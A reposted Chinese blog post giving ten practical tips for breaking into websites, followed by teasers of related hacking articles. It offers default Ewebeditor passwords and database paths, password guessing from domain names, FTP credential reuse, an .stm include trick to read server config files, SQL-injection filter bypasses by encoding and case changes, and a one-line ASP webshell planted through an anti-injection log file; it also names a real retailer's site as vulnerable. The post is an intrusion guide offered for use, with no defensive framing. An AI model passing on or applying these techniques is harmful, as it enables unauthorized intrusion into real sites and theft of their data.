入侵网站时的十种小经验

转载 2015年11月18日 11:31:01
入侵网站时的十种小经验
1.例如我们的目标网址为
“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是Linux
2. Ewebeditor拿站的新技巧
Ewebeditor 大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下载默认数据库‘/db/ewebeditor.mdb”,如果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999登陆,或者输入“/db/ewebeditor1013.mdb”就能下载到数据库了。这个方法有%80的几率能拿下目标!
3. 社工的小技巧
在入侵的时候如果目标网站有论坛的话,我们可以试一下社工,例如一个网站是“www.xxxx.cn”, 管理员名称为admin,那么我们就可以试试用密码“xxxx”和“xxxx.cn”来登陆,这种方法最适合在入侵大型公司网站的时候使用!
4. 入侵时的思维拓展
有时候我们获得了目标网站的管理员密码,但是又找不到后台,这是可以试下用FTP登陆,例如,目标网站是”www.xxxx.cn “ 得到的密码为“bishi”,我们就可以试下用“xxxx”“xxxx.cn”www.xxxx.cn作为FTP 用户名,用“bishi”:作为FTP密码来进行登陆,成功的几率可以很大的哦!)
5. 入侵时获得管理员名称
有时候在入侵类似于新闻发布网的网站时,注入得到了管理员密码,但是拿不到管理员的名称,网站上也没有论坛什么的,这时候该怎么办呢?我们可以随便打开一个新闻,然手仔细找找诸如“提交者”“发布者”之类的字眼,一般“提交者”就是管理员的名称了。
6. 寻找管理员后台
有时候我们得到了管理员的账号和密码,但是却苦于找不到后台。这时候我们可以对着网站上的图片点右键,查看其属性。有时的确能找到后台的。
7 . 暴web绝对路径
众所周知,在入侵asp.net的网站时,我们首先就是在aspx文件前加上一个“~”来尝试暴出web的绝对路径,但在入侵用ASP+IIS架设的网站时能不能用呢?答案是肯定的,但是有一定的技巧,假设目标网站的主页为 www.xxxxx/index.asp,我们可以尝试提交这样的网址www.xxxxx.cn/fkbhvv.aspx ,其中fkbhvv.aspx 是不存在的!这个方法的成功率大约是%60. 家乐福的官方站就有这个漏洞
8. stm文件在入侵中的作用
当网站不允许上传 asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “<!–#include file=”conn.asp”–>”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个 stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!
9. 注入的技巧
在找到一个网站可能存在注射漏洞的地址时(假设地址为www.xxxxxx/news.asp?id=6),我们通常会先提交一个单引号“’”来测试是否存在注射漏洞,但目前网上的通用防注入程序还是很多,所以很有可能会返回“XX通用防注入程序已阻止你试图进行的攻击!”的注入此类消息框。这时我们除了可以尝试COOKIES注入之外,还可以把变量编码一下(如”www.xxxxx/news.asp?id=6”编程”www.xxxx.cn/news.asp%69%64=6”)来进行注射,不行的话可以转换一下大小写(如“id”变成“ID”),或者转换大小写后再编码来进行注射等,总之想一些办法来把变量弄怪点,很多通用防注入程序都存在这写被绕过的缺陷!
10. 防注入程序拿shell
当你用单引号“’”来测试一个网站可能存在注入漏洞的地址时(假设网址为“www.xxxx/news.asp?id=6”)弹出了“你的操作已被记录!”这类信息,而我们又没办法去绕过防注入系统的时候,可以试着提交http://www.xxxx/sqlin.asp看看存不存在“sqlin.asp” ,如果存在的话,我们只要提交” http:// www.xxxx/news.asp?id=6′<%execute request(“j”)%>“ ,然后再用一句话木马客户端来连接http://www.xxxxx/sqlin.asp文件就行了,因为目前很多通用防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库,而且大多数都没防下载处理

怎么简单快速一个钟头入侵网站

首先,观察指定网站。 入侵指定网站是需要条件的: 要先观察这个网站是动态还是静态的。  首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点 如果是静态的...
  • lishimin1012
  • lishimin1012
  • 2014年06月10日 20:37
  • 15912

入侵指定网站的思路~菜鸟必学

首先,观察指定网站。 入侵指定网站是需要条件的: 要先观察这个网站是动态还是静态的。 首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站 点 ...
  • u012191462
  • u012191462
  • 2015年10月20日 15:09
  • 7066

网站入侵学习入门到高手所有重点难点视频推荐

今天看到一基友 Mayter/baojin 总结了下入侵学习的视频  我顺便把视频链接也放上来省得想学习入侵的童鞋去找了 现在学入侵了好多了 学习的东西都给出来了 以前我们学习入侵的时候...
  • wljlwyq
  • wljlwyq
  • 2014年10月06日 18:38
  • 2790

如何入侵jsp网站

在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务器器更加安全吗?前段时间,应朋友之邀,我...
  • qq_20545159
  • qq_20545159
  • 2015年01月26日 16:26
  • 1582

总结揭露黑客入侵网站的手法

总结揭露黑客入侵网站的手法 现在的黑客很猖狂啊,大家都知道网站是怎么被黑客入侵的吗? 刚才简单做了个调查,大家网站被入侵的情况发生得比较多,而且也有部分站长知道黑客是怎么入侵的,现在也有不少PHP...
  • jiumingmao11982
  • jiumingmao11982
  • 2015年11月02日 17:59
  • 911

黑客是怎样入侵你的网站的

http://www.2cto.com/Article/201302/189735.html 这个问题很难回答,简单的来说,入侵一个网站可以有很多种方法。本文的目的是展示黑客们常用的扫描和入...
  • loongwong2011
  • loongwong2011
  • 2016年08月11日 18:01
  • 1459

网站入侵的攻击方法和原理

前言闲话 声明:此文不教大家怎么破解做坏银,而是攻击方法与原理,知己知彼,才能防好自己的密码; 嗨!各位小伙伴们,又到周六了。有人还在加班,有人已经带着GirlFriend逛街去了,今天我依然一个人,...
  • qq348843576
  • qq348843576
  • 2015年05月16日 09:00
  • 3526

web网络安全——网站入侵(一)

前言:哈哈哈,Mark,硕士入学以来第一个渗透成功的网站,成功脱裤。都说研究生生活苦,确实是,从接到入侵网站都入侵成功整整半个月,纯属运气,首先网站很low,其次本人运气好,废话不多说,直接上过程。 ...
  • u012902917
  • u012902917
  • 2016年12月18日 21:22
  • 465

Aspx目标网站入侵之旁注加跨站入侵

指定目标网站入侵之旁注加跨站入侵   2010-09-17 14:06:49|  分类: 默认分类 |  标签: |举报 |字号大中小 订阅 今天中午群里的幸福又发站出来了,...
  • kendyhj9999
  • kendyhj9999
  • 2014年06月14日 08:31
  • 1053

网站入侵思路(初级黑客渗透篇)

网站入侵思路(初级黑客渗透篇)           作者:80  1,〓经典注入〓      通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and...
  • lizhengnanhua
  • lizhengnanhua
  • 2014年09月11日 04:23
  • 31885
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:入侵网站时的十种小经验
举报原因:
原因补充:

(最多只允许输入30个字)